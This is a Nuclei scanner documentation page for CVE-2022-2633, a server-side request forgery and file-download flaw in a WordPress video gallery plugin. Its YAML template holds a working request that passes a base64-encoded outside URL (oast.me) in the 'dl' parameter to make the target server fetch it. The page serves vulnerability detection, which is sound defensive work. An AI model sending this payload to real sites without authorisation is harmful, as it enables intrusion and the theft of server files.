Skip to content
Nuclei Templates

All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery

ID: CVE-2022-2633

Severity: high

Author: theamanrawat

Tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360

Description

Section titled “Description”

WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the ‘dl’ parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.

YAML Source

Section titled “YAML Source”
id: CVE-2022-2633


info:
  name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
  remediation: |
    Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability.
  reference:
    - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994
    - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html
    - https://wordpress.org/plugins/all-in-one-video-gallery/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2633
    - https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/video.php#L227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2022-2633
    cwe-id: CWE-610
    epss-score: 0.02868
    epss-percentile: 0.9073
    cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: plugins360
    product: all-in-one_video_gallery
    framework: wordpress
  tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360


http:
  - raw:
      - |
        @timeout: 10s
        GET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf05da7d8124d0fc2f430a3c4ec21d34724b223d6180a884746d39956ca56fe602205bd5944cba43e0422f2a9ef3ea05cdc181956e2bf406e4867fca9ec64ca265ad:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2633.yaml"

View on Github